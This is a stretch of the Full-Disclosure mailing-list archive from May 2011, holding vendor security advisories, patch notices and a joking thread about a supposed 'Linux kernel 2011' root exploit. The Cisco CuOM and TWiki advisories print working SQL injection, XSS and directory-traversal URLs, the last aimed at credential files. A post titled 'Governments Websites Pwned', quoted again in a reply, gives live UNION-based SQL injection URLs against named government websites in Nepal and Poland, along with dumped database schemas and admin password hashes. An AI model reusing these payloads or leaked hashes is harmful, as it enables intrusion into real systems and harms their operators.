[Full-disclosure] Cisco Unified Operations Manager Multiple Vulnerabilities - SOS-11-006
Sense of Security - Security Advisory - SOS-11-006 Release Date. 18-May-2011 Last Update. - Vendor Notification Date. 28-Feb-2011 Product. Cisco Unified Operations Manager Common Services Framework Help Servlet Common Services Device Center CiscoWorks Homepage Note: All of the above products are included by default in CuOM. Platform. Microsoft Windows Affected versions. CuOM 8.0 and 8.5 (verified), possibly others. Severity Rating. Medium - Low Impact.Database access, cookie and credential theft, impersonation, loss of confidentiality, local file disclosure, information disclosure. Attack Vector. Remote with authentication Solution Status. Vendor patch (upgrade to CuOM 8.6 as advised by Cisco) CVE reference. CVE-2011-0959 (CSCtn61716) CVE-2011-0960 (CSCtn61716) CVE-2011-0961 (CSCto12704) CVE-2011-0962 (CSCto12712) CVE-2011-0966 (CSCto35577) Details. Cisco Unified Operations Manager (CuOM) is a NMS for voice developed by Cisco Systems. Operations Manager monitors and evaluates the current status of both the IP communications infrastructure and the underlying transport infrastructure in your network. Multiple vulnerabilities have been identified in Cisco Unified Operations Manager and associated products. These vulnerabilities include multiple blind SQL injections, multiple XSS. and a directory traversal vulnerability. 1. Blind SQL injection vulnerabilities that affect CuOM CVE-2011-0960 (CSCtn61716): The Variable CCMs of PRTestCreation can trigger a blind SQL injection vulnerability by supplying a single quote, followed by a time delay call: /iptm/PRTestCreation.do?RequestSource=dashboardMACs=CCMs='waitfor%20 delay'0:0:20'--Extns=IPs= Additionally, variable ccm of TelePresenceReportAction can trigger a blind SQL injection vulnerability by supplying a single quote: /iptm/TelePresenceReportAction.do?ccm='waitfor%20delay'0:0:20'-- 2. Reflected XSS vulnerabilities that affect CuOM CVE-2011-0959 (CSCtn61716): /iptm/advancedfind.do?extn=73fcb/scriptscriptalert(1)/script23fb e43447 /iptm/ddv.do?deviceInstanceName=f3806%3balert(1)//9b92b050cf5deviceC apability=deviceCap /iptm/ddv.do?deviceInstanceName=25099scriptalert(1)/scriptf813ea8c 06ddeviceCapability=deviceCap /iptm/eventmon?cmd=filterHelperca99bscriptalert(1)/script542256870 d5viewname=device.filteroperation=getFilterdojo.preventCache=129851 8961028 /iptm/eventmon?cmd=getDeviceDatagroup=/3309dscriptalert(1)/script 09520eb762cdojo.preventCache=1298518963370 /iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=d4f84%3b alert(1)//608ddbf972 /iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=c25e8%3ba lert(1)//79877affe89 /iptm/logicalTopo.do?clusterName=ccmName=ed1b1%3balert(1)//cda6137ae 4c /iptm/logicalTopo.do?clusterName=db4c1%3balert(1)//4031caf63d7 Reflected XSS vulnerability that affect Common Services Device Center CVE-2011-0962 (CSCto12712): /CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introduc tionhomepage61a8b%3balert(1)//4e9adfb2987 Reflected XSS vulnerability that affects Common Services Framework Help Servlet CVE-2011-0961 (CSCto12704): /cwhp/device.center.do?device=72a9fscriptalert(1)/script5f5251a aad=1 3. Directory traversal vulnerability that affects CiscoWorks Homepage CVE-2011-0966 (CSCto35577): http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini cmfDBA user database info: http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.prope rties DB connection info for all databases: http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.proper ties Note: When reading large files such as this file, ensure the row limit is adjusted to 500 for example. DB password change log: http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\log\dbpwdChange.log Solution. Upgrade to CuOM 8.6. Refer to Cisco Bug IDs: CSCtn61716, CSCto12704, CSCto12712 and CSCto35577 for information on patches and availability of fixes. Discovered by. Sense of Security Labs. About us. Sense of Security is a leading provider of information security and risk management solutions. Our team has expert skills in assessment and assurance, strategy and architecture, and deployment through to ongoing management. We are Australia's premier
[Full-disclosure] Governments Websites Pwned !!
_ _ _ ___ _ _ / \ _ __ | |_(_)|_ _|_ __ | |_ _ __ _ _ __| | ___ _ __ ___ / _ \ | '_ \| __| |_| || '_ \| __| '__| | | |/ _` |/ _ \ '__/ __| / ___ \| | | | |_| |_| || | | | |_| | | |_| | (_| | __/ | \__ \ /_/ \_\_| |_|\__|_||___|_| |_|\__|_| \__,_|\__,_|\___|_| |___/ .com Lolzz following GOV sites SQL Injection is working from last years . why they don't like to patch it !! Preety layz people are in goverment sectors like there layz jobs . Many newbies are learning SQL injection from the Gov. sites :p lolz .. I think it is time to weak up .. Here All MySQL Version 5 And Version 4 Websites are injected ! Special Thanks to Silic0n Work Done By @r@yn... --- --- http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,database%28%29,3,4,5,6,7,8,9,10,11,12,13-- DB:eproc_seznepal_gov_np --- --- http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12,13%20from%20information_schema.tables%20where%20table_schema=database%28%29-- TAble: tbl_acknowledgement, tbl_addenda, tbl_admin_info, tbl_adminlogin, tbl_agency, tbl_agency_category, tbl_announcement, tbl_archive_auction, tbl_archive_tender, tbl_award,tbl_award1, tbl_bid,tbl_bid_document, tbl_bid_document_additional, tbl_bid_modification, tbl_clarification, tbl_company_category, tbl_contract,tbl_customer, tbl_faq,tbl_information, tbl_info --- --- http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat%28table_name,0x3a,column_name%29,3,4,5,6,7,8,9,10,11,12,13%20from%20information_schema.columns%20where%20table_schema=database%28%29-- columns: acknowledgementid, provider_id, agency_id, project_id, project_type, project_name, activity, date, time,ip, addendaid, noticeid, date, newspaper, description, filename, filetype, filesize, document, admin_id, firstname, lastname, email_addr, secret_question, answer, admin_id, user_name, pass_word, user_level, agency_id, organization_name, organization_reg_num, vat_num table tbl_acknowledgement:acknowledgementid, tbl_acknowledgement:provider_id, tbl_acknowledgement:agency_id, tbl_acknowledgement:project_id, tbl_acknowledgement:project_type, tbl_acknowledgement:project_name, tbl_acknowledgement:activity, tbl_acknowledgement:date, tbl_acknowledgement:time, tbl_acknowledgement:ip, tbl_addenda:addendaid, tbl_addenda:noticeid http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat(admin_id,0x3a,user_name,0x3a,pass_word),3,4,5,6,7,8,9,10,11,12,13 from tbl_adminlogin-- ARMIN: 1:sez:7a4489303e667e03b6414997b53aa003 --- --- http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,database%28%29-- DB:national_nm --- --- http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=database%28%29-- table:admin,events,news --- --- http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_schema=database%28%29-- col: id, username, password, events_id, date, events_title, events_short_desc, events_full_desc, enabled, id,date, news_title, news_short_desc, author, news_full_desc,enabled --- --- http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28username,0x3a,password%29%20from%20admin-- admin pass:admin:*4F7F6D6AF7CD8CD89967918F893DA545DDA85623 --- --- http://www.praca.gov.pl/pages/klasyfikacja_zawodow2.php?klasyfikacja_zawodow_id=197%20and%201=2%20union%20select%201,@@version,3,4,5,6%20-- version:5.0.51a-24+lenny5-log --- ---
[Full-disclosure] Linux kernel 2011 local root does it exist
Greetings, I would like to know is there any local root exploit exist for linux kernel 2011 . I have seen such video on securitytube and youtube . I wonder is there any POC so such thing available so I can analyze and test it in my lab environment . Looking forward for your kind response. Regards Lee ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS vulnerability in TWiki 5.0.2
Information --- Name : XSS vulnerability in TWiki Software : TWiki 5.0.1 and possibily below. Vendor Hompeage : http://twiki.org/ Vulnerability Type : Cross-Site Scripting Severity : High Researcher : Mesut Timur mesut [at] mavitunasecurity [dot] com Advisory Reference : NS-11-005 CVE : CVE-2011-1838 Description --- TWiki® is a flexible, powerful, and easy to use enterprise wiki, enterprise collaboration platform, and web application platform. It is a Structured Wiki, typically used to run a project development space, a document management system, a knowledge base, or any other groupware tool, on an intranet, extranet or the Internet. Details --- TWiki is affected by XSS vulnerabilities in version 5.0.1. Example PoC url is as follows : http://example.com/bin/login?sudo=sudo;origurl=http://example.com/bin/view/Main/TWikiAdminUser%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x00044C%29%3C%2Fscript%3E http://example.com/bin/login/Main/WebHome? '1=;origurl=1'--/style/scriptscriptalert(0x00039C)/script You can read the full article about Cross-Site Scripting vulnerabilities from here : http://www.mavitunasecurity.com/crosssite-scripting-xss/ Solution --- Upgrade to the latest TWiki version (5.0.2). Credits --- It has been discovered on testing of Netsparker, Web Application Security Scanner - http://www.mavitunasecurity.com/netsparker/. References --- Vendor Url : http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2011-1838 MSL Advisory Link : http://www.mavitunasecurity.com/XSS-vulnerability-in-Twiki/ Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/ About Netsparker --- Netsparker® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allows it to be dead accurate in reporting hence it's the first and the only False Positive Free web application security scanner. -- Netsparker Advisories, advisor...@mavitunasecurity.com Homepage, http://www.mavitunasecurity.com/netsparker-advisories/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SUSE Security Announcement: flash-player (SUSE-SA:2011:025)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:flash-player Announcement ID:SUSE-SA:2011:025 Date: Tue, 17 May 2011 12:00:00 + Affected Products: openSUSE 11.3 openSUSE 11.4 SUSE Linux Enterprise Desktop 11 SP1 SUSE Linux Enterprise Desktop 10 SP4 Vulnerability Type: remote code execution CVSS v2 Base Score: 6.8 SUSE Default Package: yes Cross-References: CVE-2011-0589, CVE-2011-0618, CVE-2011-0619 CVE-2011-0620, CVE-2011-0621, CVE-2011-0622 CVE-2011-0623, CVE-2011-0624, CVE-2011-0625 CVE-2011-0626, CVE-2011-0627 Content of This Advisory: 1) Problem Description flash-player security update to 10.3 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion Flash Player has been updated to version 10.3, fixing bugs and security issues. - CVE-2011-0589: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P): Buffer Errors (CWE-119) - CVE-2011-0618: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P): Numeric Errors (CWE-189) - CVE-2011-0619: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P): Buffer Errors (CWE-119) - CVE-2011-0620: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P): Buffer Errors (CWE-119) - CVE-2011-0621: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P): Buffer Errors (CWE-119) - CVE-2011-0622: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P): Buffer Errors (CWE-119) - CVE-2011-0623: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P): Input Validation (CWE-20) - CVE-2011-0624: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P): Input Validation (CWE-20) - CVE-2011-0625: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P): Input Validation (CWE-20) - CVE-2011-0626: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P): Input Validation (CWE-20) - CVE-2011-0627: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P): Input Validation (CWE-20) More information can be found on: http://www.adobe.com/support/security/bulletins/apsb11-12.html 2) Solution or Work-Around If supported by the browser, you can disable the flash plugin. 3) Special Instructions and Notes After the flash player update has been installed, all programs utilizing the flash plugin should be restarted. In particular web browser sessions should be restarted.a 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update module or the zypper commandline tool. The package and patch management stack will detect which updates are required and automatically perform the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: openSUSE 11.4: http://download.opensuse.org/update/11.4/rpm/i586/flash-player-10.3.181.14-0.2.1.i586.rpm openSUSE 11.3: http://download.opensuse.org/update/11.3/rpm/i586/flash-player-10.3.181.14-0.2.1.i586.rpm Sources: openSUSE 11.4: http://download.opensuse.org/update/11.4/rpm/src/flash-player-10.3.181.14-0.2.1.nosrc.rpm openSUSE 11.3: http://download.opensuse.org/update/11.3/rpm/src/flash-player-10.3.181.14-0.2.1.nosrc.rpm Our maintenance customers are notified individually. The packages are offered for installation from the maintenance web: SUSE Linux Enterprise Desktop 10 SP4 http://download.novell.com/patch/finder/?keywords=9c4e6f8f60161b73ef86d4ce0079ed69 SUSE Linux Enterprise Desktop 11 SP1 http://download.novell.com/patch/finder/?keywords=25f459f5151ec35f0bbe1202ce1245ad __ 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. __ 6) Authenticity Verification and Additional Information -
[Full-disclosure] Linux kernel 2011 local root does it exist
Sorry men, there is no exploit for Linux Kernel(TM) 2011. But you have exploits for Linux XP. I would like to know is there any local root exploit exist for linux kernel 2011 . signature.asc Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vivek's latest wireless challange - $50 up for grabs
http://www.securitytube.net/video/1884 Just posted ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Governments Websites Pwned !!
Welcome to 101 of stay out of jail.. Todays topic is: How not to piss off the govt. :| On Wed, May 18, 2011 at 8:54 AM, aryan hacky aryan.ha...@gmail.com wrote: _ _ _ ___ _ _ / \ _ __ | |_(_)|_ _|_ __ | |_ _ __ _ _ __| | ___ _ __ ___ / _ \ | '_ \| __| |_| || '_ \| __| '__| | | |/ _` |/ _ \ '__/ __| / ___ \| | | | |_| |_| || | | | |_| | | |_| | (_| | __/ | \__ \ /_/ \_\_| |_|\__|_||___|_| |_|\__|_| \__,_|\__,_|\___|_| |___/ .com Lolzz following GOV sites SQL Injection is working from last years . why they don't like to patch it !! Preety layz people are in goverment sectors like there layz jobs . Many newbies are learning SQL injection from the Gov. sites :p lolz .. I think it is time to weak up .. Here All MySQL Version 5 And Version 4 Websites are injected ! Special Thanks to Silic0n Work Done By @r@yn... --- --- http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,database%28%29,3,4,5,6,7,8,9,10,11,12,13-- DB:eproc_seznepal_gov_np --- --- http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12,13%20from%20information_schema.tables%20where%20table_schema=database%28%29-- TAble: tbl_acknowledgement, tbl_addenda, tbl_admin_info, tbl_adminlogin, tbl_agency, tbl_agency_category, tbl_announcement, tbl_archive_auction, tbl_archive_tender, tbl_award,tbl_award1, tbl_bid,tbl_bid_document, tbl_bid_document_additional, tbl_bid_modification, tbl_clarification, tbl_company_category, tbl_contract,tbl_customer, tbl_faq,tbl_information, tbl_info --- --- http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat%28table_name,0x3a,column_name%29,3,4,5,6,7,8,9,10,11,12,13%20from%20information_schema.columns%20where%20table_schema=database%28%29-- columns: acknowledgementid, provider_id, agency_id, project_id, project_type, project_name, activity, date, time,ip, addendaid, noticeid, date, newspaper, description, filename, filetype, filesize, document, admin_id, firstname, lastname, email_addr, secret_question, answer, admin_id, user_name, pass_word, user_level, agency_id, organization_name, organization_reg_num, vat_num table tbl_acknowledgement:acknowledgementid, tbl_acknowledgement:provider_id, tbl_acknowledgement:agency_id, tbl_acknowledgement:project_id, tbl_acknowledgement:project_type, tbl_acknowledgement:project_name, tbl_acknowledgement:activity, tbl_acknowledgement:date, tbl_acknowledgement:time, tbl_acknowledgement:ip, tbl_addenda:addendaid, tbl_addenda:noticeid http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat(admin_id,0x3a,user_name,0x3a,pass_word),3,4,5,6,7,8,9,10,11,12,13 from tbl_adminlogin-- ARMIN: 1:sez:7a4489303e667e03b6414997b53aa003 --- --- http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,database%28%29-- DB:national_nm --- --- http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=database%28%29-- table:admin,events,news --- --- http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_schema=database%28%29-- col: id, username, password, events_id, date, events_title, events_short_desc, events_full_desc, enabled, id,date, news_title, news_short_desc, author, news_full_desc,enabled --- --- http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28username,0x3a,password%29%20from%20admin-- admin pass:admin:*4F7F6D6AF7CD8CD89967918F893DA545DDA85623 --- ---
Re: [Full-disclosure] Linux kernel 2011 local root does it exist
linux kernel 2011?? what the fuck are you talking about? On Wed, May 18, 2011 at 10:41 AM, Joxean Koret joxeanko...@yahoo.es wrote: Sorry men, there is no exploit for Linux Kernel(TM) 2011. But you have exploits for Linux XP. I would like to know is there any local root exploit exist for linux kernel 2011 . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:091 ] perl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:091 http://www.mandriva.com/security/ ___ Package : perl Date: May 18, 2011 Affected: 2009.0, 2010.1, Enterprise Server 5.0 ___ Problem Description: A vulnerability has been found and corrected in perl: The (1) lc, (2) lcfirst, (3) uc, and (4) ucfirst functions in Perl 5.10.x, 5.11.x, and 5.12.x through 5.12.3, and 5.13.x through 5.13.11, do not apply the taint attribute to the return value upon processing tainted input, which might allow context-dependent attackers to bypass the taint protection mechanism via a crafted string (CVE-2011-1487). Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149amp;products_id=490 The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1487 ___ Updated Packages: Mandriva Linux 2009.0: 2a65372592d0aa2c0cef14fa13ba5077 2009.0/i586/perl-5.10.0-25.3mdv2009.0.i586.rpm 6f58332a55ba293deadfbb80827f3df2 2009.0/i586/perl-base-5.10.0-25.3mdv2009.0.i586.rpm 9b84814dc9335dfcb0dc3ad402ba289c 2009.0/i586/perl-devel-5.10.0-25.3mdv2009.0.i586.rpm 15809dc26b65fb45bd2990890da238c8 2009.0/i586/perl-doc-5.10.0-25.3mdv2009.0.i586.rpm 7ddd98eb40b0fc7665b6c9ac031726c4 2009.0/i586/perl-suid-5.10.0-25.3mdv2009.0.i586.rpm 1f77907edc97bdcf531167624d550f28 2009.0/SRPMS/perl-5.10.0-25.3mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: d2967b835c46d4a50799f687e63537c2 2009.0/x86_64/perl-5.10.0-25.3mdv2009.0.x86_64.rpm 21fb8ac662f6f9cc95e144799c3eeea7 2009.0/x86_64/perl-base-5.10.0-25.3mdv2009.0.x86_64.rpm 0307aa3f955e16707bff7eaec5ca57a5 2009.0/x86_64/perl-devel-5.10.0-25.3mdv2009.0.x86_64.rpm 958e3ebf4bb38459ff3d21d38119df68 2009.0/x86_64/perl-doc-5.10.0-25.3mdv2009.0.x86_64.rpm a14c1467114914387ceddf49093f6bc5 2009.0/x86_64/perl-suid-5.10.0-25.3mdv2009.0.x86_64.rpm 1f77907edc97bdcf531167624d550f28 2009.0/SRPMS/perl-5.10.0-25.3mdv2009.0.src.rpm Mandriva Linux 2010.1: 6a0a7a6bda22faddbaddb2c66c1b11be 2010.1/i586/perl-5.10.1-10.1mdv2010.2.i586.rpm e798818652a1441aaad1f0add4af3fc2 2010.1/i586/perl-base-5.10.1-10.1mdv2010.2.i586.rpm e05a85dacf0addcc34a80f785778ffe7 2010.1/i586/perl-devel-5.10.1-10.1mdv2010.2.i586.rpm 881b5bfbc78edeef78d3e69783c9583b 2010.1/i586/perl-doc-5.10.1-10.1mdv2010.2.i586.rpm c96eb3207cb689bdf7bdd25d91198c00 2010.1/i586/perl-suid-5.10.1-10.1mdv2010.2.i586.rpm 7f53e901f0d6a3298da34c4886b3002a 2010.1/SRPMS/perl-5.10.1-10.1mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: c532e3e57436bb60698a64e7cd0f0865 2010.1/x86_64/perl-5.10.1-10.1mdv2010.2.x86_64.rpm 9ee737d8a025526d9148b45459e5366c 2010.1/x86_64/perl-base-5.10.1-10.1mdv2010.2.x86_64.rpm 523c62e21eba8794b02e1de16e9ea7ef 2010.1/x86_64/perl-devel-5.10.1-10.1mdv2010.2.x86_64.rpm e8bc7352e949fe1633f49243838a91e6 2010.1/x86_64/perl-doc-5.10.1-10.1mdv2010.2.x86_64.rpm 74ffa4ed9f3830c2a1994e0c7ccbb462 2010.1/x86_64/perl-suid-5.10.1-10.1mdv2010.2.x86_64.rpm 7f53e901f0d6a3298da34c4886b3002a 2010.1/SRPMS/perl-5.10.1-10.1mdv2010.2.src.rpm Mandriva Enterprise Server 5: 184b241715dfb45ab0462b4c162a7f80 mes5/i586/perl-5.10.0-25.3mdvmes5.2.i586.rpm 3a1b3fcdc01c9e057ad9e188948d7e4e mes5/i586/perl-base-5.10.0-25.3mdvmes5.2.i586.rpm a6560d89ae718928aecbb8084dfc37d6 mes5/i586/perl-devel-5.10.0-25.3mdvmes5.2.i586.rpm beff68da2c44504c13eaa935f1febd94 mes5/i586/perl-doc-5.10.0-25.3mdvmes5.2.i586.rpm 25fa94fb16affee8234d0b393318238c mes5/i586/perl-suid-5.10.0-25.3mdvmes5.2.i586.rpm b7595e3b4c5c860bd6cde2d9148e36a7 mes5/SRPMS/perl-5.10.0-25.3mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 9cb402b02a1535c0d6fb84d32189a325 mes5/x86_64/perl-5.10.0-25.3mdvmes5.2.x86_64.rpm f57820d42b7c7b6371cb8d7d45f83e11 mes5/x86_64/perl-base-5.10.0-25.3mdvmes5.2.x86_64.rpm 1711e6bcdcea29f57481f20dd1f8e185 mes5/x86_64/perl-devel-5.10.0-25.3mdvmes5.2.x86_64.rpm d7ecd8441d5c9ed909c7ad8e084469b3 mes5/x86_64/perl-doc-5.10.0-25.3mdvmes5.2.x86_64.rpm 4549c6ee80c14e38a1a85fff5a262ec4 mes5/x86_64/perl-suid-5.10.0-25.3mdvmes5.2.x86_64.rpm b7595e3b4c5c860bd6cde2d9148e36a7 mes5/SRPMS/perl-5.10.0-25.3mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security.
Re: [Full-disclosure] Linux kernel 2011 local root does it exist
On Wed, 18 May 2011, Joxean Koret wrote: Sorry men, there is no exploit for Linux Kernel(TM) 2011. But you have exploits for Linux XP. This is so true, and it's maddening because those same exploits were also present in Linux OS 9. You won't have to dig hard to find them. I would like to know is there any local root exploit exist for linux kernel 2011 . -- Paul Heinlein heinl...@madboa.com http://www.madboa.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux kernel 2011 local root does it exist
On Wed, 18 May 2011 07:04:32 -0700 (PDT), Paul Heinlein wrote: On Wed, 18 May 2011, Joxean Koret wrote: Sorry men, there is no exploit for Linux Kernel(TM) 2011. But you have exploits for Linux XP. This is so true, and it's maddening because those same exploits were also present in Linux OS 9. You won't have to dig hard to find them. I would like to know is there any local root exploit exist for linux kernel 2011 . Can't wait for Linux 2012. These Electronic Arts guys are geniuses. -- phocean ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:092 ] perl-IO-Socket-SSL
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:092 http://www.mandriva.com/security/ ___ Package : perl-IO-Socket-SSL Date: May 18, 2011 Affected: 2010.1 ___ Problem Description: A vulnerability has been found and corrected in perl-IO-Socket-SSL: IO::Socket::SSL Perl module 1.35, when verify_mode is not VERIFY_NONE, fails open to VERIFY_NONE instead of throwing an error when a ca_file/ca_path cannot be verified, which allows remote attackers to bypass intended certificate restrictions (CVE-2010-4334). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4334 ___ Updated Packages: Mandriva Linux 2010.1: 007ca8027ba70b7e4ab5da50c885be90 2010.1/i586/perl-IO-Socket-SSL-1.330.0-1.1mdv2010.2.noarch.rpm 9018fd9f1902f37c8ec0c25e4338bb7b 2010.1/SRPMS/perl-IO-Socket-SSL-1.330.0-1.1mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: f6df3259d182f82753f57c0df646627a 2010.1/x86_64/perl-IO-Socket-SSL-1.330.0-1.1mdv2010.2.noarch.rpm 9018fd9f1902f37c8ec0c25e4338bb7b 2010.1/SRPMS/perl-IO-Socket-SSL-1.330.0-1.1mdv2010.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFN07AymqjQ0CJFipgRAsEjAKDuXfnaLn02Zl1cCXje3WCv8ec8egCfVIP7 atn1PDQgnyipvZyatT+bqN0= =CL1s -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cisco Unified Operations Manager Multiple Vulnerabilities - SOS-11-006
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello, This is the Cisco PSIRT response to the vulnerabilities that were discovered and reported to Cisco Systems by Brett Gervasoni of Sense of Security, regarding multiple vulnerabilities in Cisco Unified Operations Manager (CuOM). We greatly appreciate the opportunity to work with researchers on security vulnerabilities and welcome the opportunity to review and assist in product reports. These vulnerabilities are documented in the following Cisco bug IDs and Intellishield vulnerability alerts: * CSCtn61716: XSS and SQL Blind Vulnerabilities in Cisco Unified Operations Manager Intellishield vulnerability alerts: SQL Blind Injection: http://tools.cisco.com/security/center/viewAlert.x?alertId=23085 CuOM XSS Vulnerabilities: http://tools.cisco.com/security/center/viewAlert.x?alertId=23086 * CSCto12704: Reflected Cross Site Scripting into ServerHelpEngine servlet Intellishield vulnerability alert: http://tools.cisco.com/security/center/viewAlert.x?alertId=23088 * CSCto12712: XSS vulnerability in CuOM Device Center Intellishield vulnerability alert: http://tools.cisco.com/security/center/viewAlert.x?alertId=23087 * CSCto35577: Directory Traversal vulnerabilities in CWHP Intellishield vulnerability alert: http://tools.cisco.com/security/center/viewAlert.x?alertId=23089 Information related to affected software versions and fixed software are available in the published Intellishield vulnerability alerts and the Cisco Bug ID release note enclosures. Cisco PSIRT -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iF4EAREIAAYFAk3T3YwACgkQQXnnBKKRMNA3lwD8DFK3dw5Gc5ZsGbajYDc0YuGx nGeYOvu2Hcp1gDBrFvcA/1DcbqvNMwMf0+04qWpUWSD+ckwfIh7LmNROFONwBCEI =ypJ9 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux kernel 2011 local root does it exist
